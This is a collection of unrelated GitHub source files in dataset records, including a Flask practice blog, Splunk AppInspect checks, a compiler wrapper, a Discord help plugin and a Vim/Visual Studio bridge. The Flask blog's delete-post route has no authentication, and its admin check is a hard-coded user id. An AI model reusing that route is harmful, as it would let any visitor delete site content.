count+=1\nprint(count)\n\nprint(a)\n","repo_name":"sanasc/research-parks","sub_path":"safe_graph_day_analysis.py","file_name":"safe_graph_day_analysis.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27670313212","text":"from flask import Flask, render_template, redirect, url_for, flash, abort\nfrom flask_bootstrap import Bootstrap\nfrom flask_ckeditor import CKEditor\nfrom datetime import date\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm import relationship\nfrom flask_login import UserMixin, login_user, LoginManager, login_required, current_user, logout_user\nfrom forms import CreatePostForm, CreateCommentForm, RegisterForm, LoginForm\nfrom flask_gravatar import Gravatar\nfrom functools import wraps\nimport os\n\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = os.environ.get('SECRET_KEY')\nckeditor = CKEditor(app)\nBootstrap(app)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = \"login\"\n\n##CONNECT TO DB\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL', 'sqlite:///blog.db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ngravatar = Gravatar(app,\n size=100,\n rating='g',\n default='retro',\n force_default=False,\n force_lower=False,\n use_ssl=False,\n base_url=None)\n\ndb = SQLAlchemy(app)\n\n\n##CONFIGURE TABLES\n\n\nclass User(UserMixin, db.Model):\n __tablename__ = \"users\"\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(250), nullable=False)\n password = db.Column(db.String(250), unique=True, nullable=False)\n name = db.Column(db.String(250), nullable=False)\n # blog_posts = relationship(\"BlogPost\", back_populates=\"author\")\n blog_posts = relationship(\"BlogPost\", backref=\"author\")\n comments = relationship(\"Comment\", backref=\"commenter\")\n # comments = relationship(\"Comment\", back_populates=\"user\")\n\n\n\nclass BlogPost(db.Model):\n __tablename__ = \"blog_posts\"\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(250), unique=True, nullable=False)\n subtitle = db.Column(db.String(250), nullable=False)\n date = db.Column(db.String(250), nullable=False)\n body = db.Column(db.Text, nullable=False)\n img_url = db.Column(db.String(250), nullable=False)\n author_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"), nullable=False)\n # author = relationship(\"User\", back_populates=\"blog_posts\")\n comments = relationship('Comment', backref=\"post\")\n # comments = relationship('Comment', back_populates=\"post\")\n\n\nclass Comment(db.Model):\n __tablename__ = \"comments\"\n id = db.Column(db.Integer, primary_key=True)\n comment = db.Column(db.String(250), nullable=True)\n post_id = db.Column(db.Integer, db.ForeignKey('blog_posts.id'), nullable=False)\n # post = relationship(\"BlogPost\", back_populates='comments')\n commenter_id = db.Column(db.Integer, db.ForeignKey(\"users.id\"), nullable=False)\n # user = relationship('User', back_populates='comments')\n\n# one to manyについて\n# ForeingnKey外部キー(親テーブルのid)を子テーブル(blog_posts)に設定する\n# authorにUserインスタンスが入るとそれがもつidを取り出してauthor_idに入いり、\n# 一方そのUserインスタンスのblog_postsには外部キーauthor_idの値をもつblogpostが全て入る\n\n# manyの方にoneからの外部キーを設定して、それに対応するoneインスタンスが入るプロパティをrelationship()で設定してoneと紐づける。\n# 逆にoneの方でも自身の外部キー(ここではPKのid)に応じたmanyインスタンスが入るプロパティをrelationship()で設定してmanyへの紐づけを行う。\n# その際には対応するエンティティ(クラス)のどのプロパティに紐づいているを互いにback_populatesパラメータで明示する\n\n# ①manyの方にoneからの外部キーを設定して、\n# ②oneの方でrelationship()を使い、manyとの紐づけを行う。パラメーターとしてmanyのクラス名,manyに作成されるプロパティ名を入れる\n# ③manyには自動的にoneのクラスが入るプロパティが作成され、①で設定したプロパティに外部キーが入り、oneには外部キーに該当するoneオブジェクトがリストで入る\n\ndef admin_only(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n if not current_user.get_id() == \"1\":\n return abort(403)\n return f(*args, **kwargs)\n return decorated_function\n\ndb.create_all()\n\n@login_manager.user_loader\ndef load_user(user_id):\n return db.session.query(User).get(user_id)\n\n@app.route('/')\ndef get_all_posts():\n # print(current_user.blog_posts)\n posts = BlogPost.query.all()\n\n return render_template(\"index.html\", all_posts=posts)\n\n\n@app.route('/register', methods=['POST', 'GET'])\ndef register():\n register_form = RegisterForm()\n if register_form.validate_on_submit():\n inputted_email = register_form.email.data\n inputted_password = register_form.password.data\n inputted_name = register_form.name.data\n\n user = db.session.query(User).filter_by(email=inputted_email).first()\n if user:\n flash('You have signed up with that email. Please login.')\n return redirect(url_for('login'))\n\n hashed_and_salted_password = generate_password_hash(inputted_password)\n\n new_user = User(\n email=inputted_email,\n password=hashed_and_salted_password,\n name=inputted_name\n )\n db.session.add(new_user)\n db.session.commit()\n login_user(new_user)\n return redirect(url_for('get_all_posts'))\n return render_template(\"register.html\", form=register_form)\n\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n login_form = LoginForm()\n if login_form.validate_on_submit():\n inputted_email = login_form.email.data\n inputted_password = login_form.password.data\n user = db.session.query(User).filter_by(email=inputted_email).first()\n if not user:\n flash('The email does not exist. Please try again.')\n return redirect(url_for('login'))\n elif not check_password_hash(user.password, inputted_password):\n flash('Password incorrect. Please try again.')\n return redirect(url_for('login'))\n else:\n login_user(user)\n return redirect(url_for('get_all_posts'))\n return render_template(\"login.html\", form=login_form)\n\n# logout = decorated_view\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('get_all_posts'))\n\n# @app.route(\"/post\")\n@app.route(\"/post/\", methods=['POST', 'GET'])\ndef show_post(post_id):\n comment_form = CreateCommentForm()\n requested_post = BlogPost.query.get(post_id)\n # print(requested_post.author.email)\n all_comments = requested_post.comments\n # print(all_comments[0].author.email)\n # all_comments = db.session.query(Comment).filter_by(post_id=post_id).all()\n if comment_form.validate_on_submit():\n if not current_user.is_authenticated:\n flash('You need to login or register to comment')\n return redirect(url_for('login'))\n # 上からコードを読んで親テーブルでリレーションされた順、その際に設定されたプロパティんに引数を入れなければならない。\n # 逆にすると何故か片方生成されない\n new_comment = Comment(\n comment=comment_form.body.data,\n commenter=current_user,\n post=requested_post\n )\n db.session.add(new_comment)\n db.session.commit()\n return redirect(url_for('show_post', post_id=post_id))\n return render_template(\"post.html\", post=requested_post, form=comment_form, comments=all_comments)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/contact\")\ndef contact():\n return render_template(\"contact.html\")\n\n\n@app.route(\"/new-post\", methods=['POST', 'GET'])\n@admin_only\ndef add_new_post():\n form = CreatePostForm()\n if form.validate_on_submit():\n new_post = BlogPost(\n title=form.title.data,\n subtitle=form.subtitle.data,\n body=form.body.data,\n author=current_user,\n img_url=form.img_url.data,\n date=date.today().strftime(\"%B %d, %Y\"),\n )\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"make-post.html\", form=form)\n\n\n@app.route(\"/edit-post/\", methods=['POST', 'GET'])\n@admin_only\ndef edit_post(post_id):\n post = BlogPost.query.get(post_id)\n edit_form = CreatePostForm(\n title=post.title,\n subtitle=post.subtitle,\n img_url=post.img_url,\n body=post.body\n )\n if edit_form.validate_on_submit():\n post.title = edit_form.title.data\n post.subtitle = edit_form.subtitle.data\n post.img_url = edit_form.img_url.data\n post.body = edit_form.body.data\n db.session.commit()\n return redirect(url_for(\"show_post\", post_id=post.id))\n\n return render_template(\"make-post.html\", form=edit_form)\n\n\n@app.route(\"/delete/\")\ndef delete_post(post_id):\n post_to_delete = BlogPost.query.get(post_id)\n db.session.delete(post_to_delete)\n db.session.commit()\n return redirect(url_for('get_all_posts'))\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"aiztky123/practice-blog-site","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40091498504","text":"import logging\nimport os\n# Custom Libraries\nimport splunk_appinspect\n\nreport_display_order = 2\nlogger = logging.getLogger(__name__)\n\n\n@splunk_appinspect.cert_version(min=\"1.1.23\")\n@splunk_appinspect.tags(\"splunk_appinspect\")\ndef check_indexes_conf_does_not_exist(app, reporter):\n \"\"\"Check that the app does not create indexes.\"\"\"\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n reporter_output = (\"Apps and add-ons should not create indexes. Indexes\"\n \" should only be defined by Splunk System\"\n \" Administrators to meet the data storage and\"\n \" retention needs of the installation. Consider\"\n \" using Tags or Source Types to identify data\"\n \" instead index location. File: {}\"\n ).format(file_path)\n reporter.fail(reporter_output, file_path)\n\n\n@splunk_appinspect.cert_version(min=\"1.1.7\")\n@splunk_appinspect.tags(\"splunk_appinspect\", \"cloud\")\ndef check_validate_default_indexes_not_modified(app, reporter):\n \"\"\"Check that no default Splunk indexes are modified by the app.\"\"\"\n default_indexes = [\"_audit\", \"_internal\", \"_introspection\" \"_thefishbucket\",\n \"history\", \"main\", \"provider-family:hadoop\",\n \"splunklogger\", \"summary\", \"volume:_splunk_summaries\"]\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n indexes_config = app.get_config(\"indexes.conf\")\n for section in indexes_config.sections():\n if section.name in default_indexes:\n reporter_output = (\"The following index was modified: {}. File: {}, Line: {}.\"\n ).format(section,\n file_path,\n section.lineno)\n reporter.fail(reporter_output, file_path, section.lineno)\n else:\n reporter_output = \"No `default/indexes.conf`file exists.\"\n reporter.not_applicable(reporter_output)\n\n@splunk_appinspect.cert_version(min=\"1.5.0\")\n@splunk_appinspect.tags(\"splunk_appinspect\")\ndef check_index_definition_has_required_options(app, reporter):\n \"\"\"Check that all index definitions exist all required options including:\n homePath, coldPath, and thawedPath.\n \"\"\"\n required_options = [\"homePath\", \"coldPath\", \"thawedPath\"]\n filter_section_prefix = (\"provider-family:\", \"provider:\", \"volume:\")\n virtual_index_required_option = \"vix.provider\"\n\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n indexes_config = app.get_config(\"indexes.conf\")\n for section in indexes_config.sections():\n # not check default stanza\n if section.name is \"default\":\n continue\n # not check provider-family, provider and volume\n if section.name.startswith(filter_section_prefix):\n continue\n # not check virtual index\n if section.has_option(virtual_index_required_option):\n continue\n for required_option in required_options:\n if not section.has_option(required_option):\n lineno = section.lineno\n reporter_output = (\"The {} index definition does not have the required option: {}. \"\n \"File: {}, Line: {}.\"\n ).format(section.name,\n required_option,\n file_path,\n lineno)\n reporter.fail(reporter_output, file_path, lineno)\n else:\n reporter_output = \"No `default/indexes.conf` file exists.\"\n reporter.not_applicable(reporter_output)\n\n\n@splunk_appinspect.cert_version(min=\"1.5.3\")\n@splunk_appinspect.tags(\"cloud\")\ndef check_indexes_conf_properties(app, reporter):\n \"\"\"Check that indexes.conf only contains the required 'homePath' , 'coldPath' , and 'thawedPath' properties\n or the optional 'frozenTimePeriodInSecs' and 'disabled' properties. All other properties are prohibited.\n This check is cloud only because indexes are not allowed via check_indexes_conf_does_not_exist.\n \"\"\"\n\n # Check rules are defined in https://jira.splunk.com/browse/ACD-2053\n\n property_white_list = ['homePath', 'coldPath', 'thawedPath']\n property_optional_white_list = ['frozenTimePeriodInSecs', 'disabled', \"datatype\"]\n if app.file_exists(\"default\", \"indexes.conf\"):\n file_path = os.path.join(\"default\", \"indexes.conf\")\n conf_file = app.get_config(\"indexes.conf\")\n # check for all sections in this .conf file\n for section in conf_file.sections():\n # check for all properties\n for option_name, option_value, option_lineno in section.items():\n # in white list\n if option_name in property_white_list:\n legal_path = _get_legal_path(section.name, option_name)\n actual_path = option_value\n if legal_path != actual_path:\n reporter_output = (\"In stanza {}, property {} should be {}, but is {} here. \"\n \"File: {}, Line: {}.\"\n ).format(section.name,\n option_name,\n legal_path,\n actual_path,\n file_path,\n option_lineno)\n reporter.fail(reporter_output, file_path, option_lineno)\n # not in option_white_list\n elif option_name not in property_optional_white_list:\n reporter_output = (\"Illegal property {} found in stanza {}. Only properties [{}]\"\n \" are allowed in default/indexes.conf. File: {}, Line: {}.\"\n ).format(option_name,\n section.name,\n \", \".join(property_white_list + property_optional_white_list),\n file_path,\n option_lineno)\n reporter.fail(reporter_output, file_path, option_lineno)\n\n\ndef _get_legal_path(index_name, property_name):\n \"\"\"\n []\n homePath = $SPLUNK_DB//db\n coldPath = $SPLUNK_DB//colddb\n thawedPath = $SPLUNK_DB//thaweddb\n \"\"\"\n pattern = '$SPLUNK_DB/{}/{}'\n pattern_dict = {\"homePath\" : \"db\", \"coldPath\" : \"colddb\", \"thawedPath\" : \"thaweddb\"}\n return pattern.format(index_name, pattern_dict[property_name])\n","repo_name":"splunkdevabhi/appinspect","sub_path":"splunk_appinspect/checks/check_indexes_configuration_file.py","file_name":"check_indexes_configuration_file.py","file_ext":"py","file_size_in_byte":7143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"70968044431","text":"import os, ntpath, re\nfrom Library import File, Library\nfrom Section import Section\nfrom Common import cmdLineOutput, makeBinUtilCommandFile\nfrom typing import List\nppcCompiler = 'powerpc-eabi-g++'\nbinUtilCommandFilePath = 'IntermediateFiles/binUtilCommands.txt'\n\nclass Compiler:\n STANDARD_OPTIONS = [\n '-ggdb3', '-nostartfiles', '-fomit-frame-pointer', '-fno-function-cse', '-ffunction-sections', '-fdata-sections',\n '-fno-exceptions', '-fno-rtti', '-fno-asynchronous-unwind-tables', '-fno-unwind-tables', '-fno-stack-check', '-std=c++17',\n '-fno-builtin', '-ffreestanding', '-mcpu=750', '-mmultiple', '-fno-inline', '-save-temps=obj', '-fno-eliminate-unused-debug-symbols', '-fno-eliminate-unused-debug-types',\n '-fverbose-asm', '-fno-threadsafe-statics', '-z common-page-size=4', '-z max-page-size=4',\n '-Wl,\"--relax\"', '-Wl,\"--gc-sections\"']\n\n def __init__(self, options: list=None):\n if options is None:\n options = self.STANDARD_OPTIONS\n self.options = options\n\n def compile(self, cppFile: File, libraries, textStart: int=None, dataStart: int=None, sections: List[Section]=None, outPath: str=None, extraOptions: list=None):\n if not cppFile.exists():\n raise AssertionError(f\"{cppFile.path} not found\")\n else:\n options = self.options.copy()\n if textStart is not None:\n options.append(f'-Wl,\"-Ttext={hex(textStart)}\"')\n if dataStart is not None:\n options.append(f'-Wl,\"--section-start=.rodata={hex(dataStart)}\"')\n if sections is not None:\n for s in sections:\n options.append(f'-Wl,\"--section-start={s.name}={hex(s.address)}\"')\n\n if extraOptions is not None:\n options.extend(extraOptions)\n commandFile = makeBinUtilCommandFile(' '.join(options))\n if outPath is None:\n outPath = ntpath.splitext(cppFile.path)[0]\n libraries = ' '.join([lib.path for lib in libraries])\n compileCommand = f\"{ppcCompiler} {cppFile.path} @{commandFile.path} {libraries} {libraries} {libraries} -o {outPath}\"\n try:\n output = cmdLineOutput(compileCommand)\n output = filterUselessWarnings(output)\n if output:\n print(output)\n except:\n os.system(compileCommand)\n else:\n return Library(outPath)\n\n\ndef filterUselessWarnings(output):\n output = re.sub('.*warning: cannot find entry symbol _start.*', '', output)\n output = re.sub('.*warning: dot moved backwards before.*', '', output)\n output = output.strip()\n return output","repo_name":"Brawlback-Team/brawlback-asm","sub_path":"BuildSystem/src/Compiler.py","file_name":"Compiler.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"83"} +{"seq_id":"44175932703","text":"from django import template\nregister = template.Library()\n\n@register.inclusion_tag('tag_show_house_list.html')\ndef show_house_list(house_list, logged_user, multiline=True, user_buttons=True):\n context = {\n 'house_list': house_list,\n 'logged_user' : logged_user,\n 'multiline' : multiline,\n 'user_buttons' : user_buttons\n }\n\n return context\n","repo_name":"HE-Arc/Home2Share","sub_path":"Home2ShareProject/main/templatetags/house_tags.py","file_name":"house_tags.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"18204870329","text":"import ezdxf\nfrom ezdxf.addons import text2path\nfrom ezdxf.enums import TextEntityAlignment\nfrom ezdxf.math import ConstructionArc\nfrom ezdxf.gfxattribs import GfxAttribs\nimport pathlib\nimport ezdxf\nfrom ezdxf import path, zoom, units\nfrom ezdxf.tools import fonts\nfrom ezdxf.addons import text2path\nfrom ezdxf.enums import TextEntityAlignment\n\n\n\ndef get_rect(msp,width,heigth,radius,set_point= (0,0)):\n msp.add_line((set_point[0]+radius,set_point[1]), (set_point[0]+width-radius, set_point[1]))\n x = (set_point[0]+width-radius,set_point[1])\n y = (set_point[0] + width, set_point[1] - radius)\n arc = ConstructionArc.from_2p_radius(\n start_point=x, end_point=y, radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n\n\n\n msp.add_line((set_point[0]+width, set_point[1]-radius), (set_point[0]+width,set_point[1]-heigth+radius))\n x = (set_point[0]+width,set_point[1]-heigth+radius)\n y = (set_point[0]+width-radius, set_point[1] - heigth)\n arc = ConstructionArc.from_2p_radius(\n start_point=x, end_point=y,\n radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n\n\n msp.add_line((set_point[0]+radius,set_point[1]-heigth), (set_point[0]+width-radius, set_point[1]-heigth))\n x = (set_point[0] + radius, set_point[1]-heigth)\n y = (set_point[0], set_point[1]-heigth + radius)\n arc = ConstructionArc.from_2p_radius(\n start_point=x,\n end_point=y,\n radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n\n\n msp.add_line((set_point[0] , set_point[1]-radius), (set_point[0], set_point[1]-heigth + radius))\n x = (set_point[0] , set_point[1]-radius)\n y = (set_point[0]+radius,set_point[1])\n\n arc = ConstructionArc.from_2p_radius(\n start_point=x,\n end_point=y,\n radius=radius, ccw=False\n )\n arc.add_to_layout(msp, dxfattribs=attribs)\n\n return msp\n\ndoc = ezdxf.new(\"R2010\", setup=True)\ndoc.units = units.CM\nmsp = doc.modelspace()\nattribs = GfxAttribs(layer=\"ENTITY\")\n\n\ndef add_text(msp,text,pos,length = 1):\n z = ezdxf.math.Matrix44()\n z = z.translate(pos[0],pos[1],0)\n attr = {\"layer\": \"OUTLINE\", \"color\": 1}\n ff = fonts.FontFace(family=\"OpenSans\")\n s = text\n align = TextEntityAlignment.ALIGNED\n path.render_splines_and_polylines(\n msp, text2path.make_paths_from_str(s, ff, align=align,m = z,length = length), dxfattribs=attr\n )\n\n attr[\"layer\"] = \"FILLING\"\n attr[\"color\"] = 2\n for hatch in text2path.make_hatches_from_str(\n s, ff, align=align, dxfattribs=attr\n ):\n msp.add_entity(hatch)\n return msp\n\nget_rect(msp,7,4,0.5)\nadd_text(msp,\"David\",(3.5,-3),length = 7*0.95)\ndoc.saveas(\"test.dxf\")","repo_name":"DavidZah/cards_generator","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8382061113","text":"from utils.safe import JusticePlugin\n\nfrom disco.types.message import MessageEmbed\n\n\nclass HelpPlug(JusticePlugin):\n \"\"\"Help | Display command details\"\"\"\n\n __name__ = \"HelpPlug\"\n\n @JusticePlugin.command(\"help\", \"[name:str]\")\n def show_help(self, event, name: str = None):\n \"\"\"Explain commands or list them\n\n The help commands provides an easy way for you to learn about a certain command, or list available ones.\n\n If you want to access a specific command, type `]help `, For example, `]help ban`.\n\n If you want to display a list all command categories, simply type `]help` with nothing else.\n\n If you want to list all commands in a category, simply type `]help `, For example, `]help Mod`\n\n Tip: commands will always be all lower case, command categories are Titled.\n \"\"\"\n\n if not name:\n embed = MessageEmbed()\n embed.color = 0x00FFFF\n embed.title = \"List Command Categories\"\n embed.description = \"If you want to see how to use the help command, type `]help help`, otherwise, \" \\\n \"below are the available command categories.\"\n for plugin in self.bot.plugins.values():\n name, desc = plugin.__doc__.split(' | ')\n embed.add_field(name=name, value=desc, inline=False)\n event.msg.reply(embed=embed)\n elif name.title() == name:\n for plugin in self.bot.plugins.values():\n if name in plugin.__doc__:\n break\n else:\n return event.msg.reply(\"Sorry, but I could not find the category '{0}'\".format(name))\n\n embed = MessageEmbed()\n embed.color = 0x00FFFF\n embed.title = plugin.__doc__\n\n for func in plugin.meta_funcs:\n if hasattr(func, 'docs'):\n embed.add_field(name=func.docs[0], value=func.docs[1], inline=False)\n\n event.msg.reply(embed=embed)\n else:\n for plugin in self.bot.plugins.values():\n for func in plugin.meta_funcs:\n if hasattr(func, 'docs') and func.docs[0] == name:\n embed = MessageEmbed()\n embed.title = func.docs[1]\n embed.color = 0x00FFFF\n embed.description = func.docs[2]\n return event.msg.reply(embed=embed)\n event.msg.reply(\"Sorry, but I could not find the command '{0}'\".format(name))\n\n\ndel JusticePlugin # We don't want disco to load this plugin\n","repo_name":"replit-discord/justice","sub_path":"plugins/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"83"} +{"seq_id":"6572148251","text":"def stubbornness(*data):\n\n res = []\n for i in data:\n if len(i) >= 2:\n q1 = int(i[0])\n m = list(map(lambda x: int(x), i[1::]))\n q2 = max(m)\n q3 = min(m)\n if 0 == q2 or 0 == q3:\n raise ZeroDivisionError('Cannot be divided by zero')\n else:\n if (q1 % q2 == 0) and (q1 % q2 == 0):\n res.append(q1)\n else:\n raise NotEnoughError('Not enough values')\n if res:\n res.sort()\n return res\n raise IndexError('Empty Return Error')\n\n\nclass NotEnoughError(Exception):\n pass\n","repo_name":"ProvPavel/ProvPavelProjects","sub_path":"kutfkitfityfif.py","file_name":"kutfkitfityfif.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"74755499790","text":"import sys\r\n\r\ncommand_arg = sys.argv[1]\r\narg_list = sys.argv[2:]\r\n\r\nfile = \"todo.txt\"\r\n\r\ndef add(task_list):\r\n\ttodo_file = open(file, 'a')\r\n\tfor task in task_list:\r\n\t\ttodo_file.write(task + '\\n')\r\n\ttodo_file.close()\r\n\r\ndef rm(index_list):\r\n\tindex_list = [int(x) for x in index_list]\r\n\ttodo_file = open(file, 'r')\r\n\tlines = todo_file.readlines()\r\n\ttodo_file.close()\r\n\r\n\tfor i in index_list:\r\n\t\tdel lines[i-1]\r\n\r\n\tnew_file = open(file, 'w+')\r\n\tfor line in lines:\r\n\t\tnew_file.write(line)\r\n\tnew_file.close()\r\n\r\ndef strike(text):\r\n\tresult = ''\r\n\tfor c in text:\r\n\t\tresult = result + c + '\\u0336'\r\n\treturn result\r\n\r\ndef done(index_list):\r\n\tindex_list = [int(x) for x in index_list]\r\n\ttodo_file = open(file, 'r')\r\n\tlines = todo_file.readlines()\r\n\tfor i in index_list:\r\n\t\tlines[i-1] = strike(lines[i-1])\r\n\r\n\tnew_file = open(file, 'w+')\r\n\tfor line in lines:\r\n\t\tnew_file.write(line)\r\n\tnew_file.close()\r\n\r\ndef printer():\r\n\ttodo_file = open(file, 'r')\r\n\ttasks = todo_file.readlines()\r\n\tfor i, task in enumerate(tasks):\r\n\t\tprint(i+1, task)\r\n\r\nif command_arg == \"add\":\r\n\tadd(arg_list)\r\n\r\nif command_arg == \"rm\":\r\n\trm(arg_list)\r\n\r\nif command_arg == \"done\":\r\n\tdone(arg_list)\r\n\r\nprinter()","repo_name":"danj98/todo","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9605747492","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport pandas as pd\nfrom simpson_paradox_finder import SimpsonParadoxFinder\nfrom sklearn.datasets import load_iris\n\npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', None)\n\ndata_path = './Data/'\n\nfile = os.path.join(data_path, 'UCB_admissions_data.csv')\ndata = pd.read_csv(file)\ntarget = 'Admit'\ntreatment = 'Gender'\nfeatures = ['Dept']\nfeatures_onehot = ['Dept']\n\n# model parameters\nparams = {'subgroup_dim': 2, 'hidden_layer': 2, 'hidden_dim': 64,\n 'learning_rate': 0.01, 'alpha': 1, 'beta': 10, 'batch_size': 64,\n 'epoch': 50, 'seed': 22, 'activation': False, 'find_strong_amp': False}\n\n# run model\nspf = SimpsonParadoxFinder(data, target, features, treatment=treatment, features_onehot=features_onehot, is_binary_target=False)\nret = spf.get_simpson_pairs(method='simnet', params=params, verbose=False)\n\nprint(\"\\nResult of Simpson's Paradox Finder:\")\nfor t in ret:\n print('T={}, Y={}, Z={}, paradox_types={}'.format(*t))\n\ngroup_distribution = spf.get_subgroup_distribution()\nprint('\\nFeature distribution:\\n', group_distribution)\n\n# save output\n# output = spf.finder.output\n","repo_name":"ant-research/Learning-to-Discover-Various-Simpson-Paradoxes","sub_path":"run_berkeley.py","file_name":"run_berkeley.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"12185796271","text":"import vim\nimport pynvim\nimport VS_wrapper\n\n# tab_based_config = False\n# instances = VS_wrapper.get_instances()\n# def __init__(self) -> None:\n # self.tab_based_config = False\n\n# def set_use_tab_based_config(tab_based=True):\n# tab_based_config = tab_based\n\nclass Vim_wrapper:\n class NoLink(IndexError):\n pass\n\n def __init__(self) -> None:\n self.tab_based_config = True\n self.reload()\n\n def open_current(self):\n try:\n file = vim.current.buffer.name\n line, col = vim.current.window.cursor\n self._get_linked_instance().open_location(file, line, col)\n except Vim_wrapper.NoLink:\n pass\n\n def reload(self):\n self.instances = VS_wrapper.get_instances()\n\n def activate(self):\n self._forward_to_linked(VS_wrapper.Instance.activate)\n\n def set_focus(self):\n self._forward_to_linked(VS_wrapper.Instance.set_focus)\n\n def toggle_breakpoint(self):\n # try:\n # inst = self._get_linked_instance()\n file_name = vim.current.buffer.name\n line, _ = vim.current.window.cursor\n self._forward_to_linked(VS_wrapper.Instance.toggle_breakpoint, file_name, line) \n\n def start_debugging(self):\n self._forward_to_linked(VS_wrapper.Instance.start_debugging)\n\n @staticmethod\n def _get_format_str(is_current):\n if is_current:\n return \"\\t*{}: {}\"\n return \"\\t {}: {}\"\n\n def set_startup_project(self):\n try: \n inst = self._get_linked_instance()\n current_startup_project = inst.get_startup_project()\n project_list = inst.get_project_list()\n\n selections_strings = \\\n [ Vim_wrapper._get_format_str(p.Name == current_startup_project).format(idx, p)\n for idx, p in enumerate(project_list) ]\n selections_strings.insert(0, \"Select Project\")\n selected = vim.funcs.inputlist(selections_strings)\n\n if selected in range(0, len(project_list)):\n inst.set_startup_project(project_list[selected])\n\n except Vim_wrapper.NoLink:\n pass\n\n def test(self):\n return self._forward_to_linked(VS_wrapper.Instance.test)\n\n def set_solution(self):\n self.instances = VS_wrapper.get_instances()\n if len(self.instances) == 0:\n print(\"No instances detected\")\n self._set_current_solution(None)\n return\n if len(self.instances) == 1:\n self._set_current_solution(next(iter(self.instances)))\n print(\"One instance found and set\")\n return\n\n current = self._get_linked_instance_key()\n\n text = [\"Select Solution\"]\n\n select_dict = {}\n counter = 1\n for (key, value) in self.instances.items():\n format = Vim_wrapper._get_format_str(current is not None and current == key)\n text.append(format.format(counter, value.get_solution_name()))\n\n select_dict[counter] = key\n counter += 1\n\n selected_key = vim.funcs.inputlist(text)\n if selected_key in select_dict:\n self._set_current_solution(select_dict[selected_key])\n\n def _get_linked_instance_key(self):\n if vim.current.tabpage.vars.get(\"vsi_current\") is not None:\n return vim.current.tabpage.vars[\"vsi_current\"]\n\n return vim.vars.get(\"vsi_current\")\n\n def _get_linked_instance(self):\n key = self._get_linked_instance_key()\n if key in self.instances:\n return self.instances[key]\n print(\"Linked instance key isn't in instance dict. Run set_solution to re-initialize\")\n raise Vim_wrapper.NoLink\n\n def _forward_to_linked(self, VS_wrapper_mothod, *args):\n try:\n return VS_wrapper_mothod(self._get_linked_instance(), *args)\n except Vim_wrapper.NoLink:\n pass\n\n def _set_current_solution(self, value):\n if value is None:\n exists = vim.funcs.exists\n if exists(\"t:vsi_current\"): vim.api.tabpage_del_var(0, \"vsi_current\")\n if exists(\"g:vsi_current\"): vim.api.del_var(\"vsi_current\")\n return\n\n if self.tab_based_config:\n vim.current.tabpage.vars[\"vsi_current\"] = value\n else:\n vim.vars[\"vsi_current\"] = value\n","repo_name":"Drllap/visual-studio-integration.vim","sub_path":"python3/Vim_wrapper.py","file_name":"Vim_wrapper.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43712195536","text":"import numpy as np\nimport os\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import patches\nimport matplotlib.transforms as transforms\nfrom astropy.time import Time\n\nfrom orbitize import system, read_input, priors, sampler\nfrom orbitize import results\n\n\"\"\"\nFits to run:\n1. lit astrometry only (True, False, False, False, False)\n2. lit astrometry + first GRAVITY epoch (True, True, False, False, False)\n2.5. lit astrometry + second GRAVITY epoch (True, False, True, False, False)\n3. lit astrometry + first 2 GRAVITY (True, True, True, False, False)\n4. first 2 GRAVITY only (False, True, True, False, False)\n5. first 2 GRAVITY with e fixed to 0 (True, True, True, True, False)\n6. first 2 GRAVITY with linearly decreasing prior on e (True, True, 